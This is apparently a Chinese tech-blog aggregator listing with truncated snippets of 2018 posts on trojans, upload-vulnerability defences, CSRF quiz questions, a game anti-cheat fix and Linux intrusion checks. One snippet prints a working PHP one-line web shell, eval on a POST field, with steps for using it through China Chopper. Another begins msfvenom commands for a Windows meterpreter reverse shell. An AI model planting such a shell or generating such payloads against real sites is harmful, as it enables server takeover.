一、先说被挂马的文件吧。 木马文件一般会伪装成正常文件,或者非可执行文件,以达到欺骗的目的。 比方说,伪装成icon图标文件。 找到一个伪装的文件,用编辑器打开,就会发现里面是源码。 这种的工作原理大概是,在某一个正常的文件中用include引入这个图标文件, 然后,文件中的代码就被不知不觉的跟随正 ...
分类:
系统相关 时间:
2018-02-26 20:37:43
阅读次数:
250
由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过文件上传漏洞上传木马等操作,危害服务器的安全。对于这种漏洞,一是阻止非法文件上传,一是禁止其运行,例如通过文件重命名,压缩重生成,对存储目录执行权限控制,或者存储目录不放在web中等措施。 ...
分类:
Web程序 时间:
2018-02-24 23:01:17
阅读次数:
241
https://yq.aliyun.com/articles/44721 xshell是我用过的最好用的ssh客户端工具,没有之一。这个软件完全免费,简单易用,可以满足通过ssh管理linux vps所有需要,唯一遗憾的是没有官方中文版。警告:不要下载所谓的汉化版,可能有木马。此前已有报道使用中文山 ...
分类:
系统相关 时间:
2018-02-24 22:04:28
阅读次数:
259
中国菜刀与一句话木马 PHP的一句话木马内容如下: <?php @eval($_POST['chopper']);?> 将这个木马放到“网站”中,打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑”。在URL列表中选中目标网站,点击鼠 ...
分类:
其他好文 时间:
2018-02-23 23:50:12
阅读次数:
376
1、在 php + mysql + apache 架构的web服务中输入GET参数 index.php?a=1&a=2&a=3 服务器端脚本 index.php 中$GET[a] 的值是?正确答案: C A 1B 2C 3D 1,2,3 2、以下哪些不是CSRF漏洞的防御方案?正确答案: D A 检 ...
分类:
其他好文 时间:
2018-02-21 18:39:17
阅读次数:
1333
《绝地求生大逃杀》BattlEye Launcher是游戏的反作弊程序,也是启动过程中做容易出现错误的,今天小编带来“爆锤吧务”分享的《绝地求生大逃杀》BE服务未正常运行及安装失败解决方法,有此烦恼的玩家赶紧来看吧。 在启动游戏之前切换成英文输入法,美式键盘。 DLL文件的各种问题 dxgi.dll ...
分类:
其他好文 时间:
2018-02-19 20:21:24
阅读次数:
440
metasploit msfconsole 命令 来源 http://www.cnblogs.com/hookjoy/p/7989715.html payload的几个常用生成 payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterprete ...
分类:
Web程序 时间:
2018-02-16 16:52:51
阅读次数:
744
效果示意图 <!DOCTYPE><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title></title><style> .div1{ width: 1200px; height: ...
分类:
其他好文 时间:
2018-02-11 20:03:34
阅读次数:
155
在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节。今天,分享一下如何检查linux系统是否遭受了入侵?一、是否入侵检查1)检查系统日志
检查系统错误登陆日志,统计IP重试次数(last命令是查看系统登陆日志,比如系统被reboot或登陆情况)
[root@localhost ~]# last
2)检查系统用户
查看是否有异常的系统用户
[root@l
分类:
系统相关 时间:
2018-02-08 13:38:25
阅读次数:
297
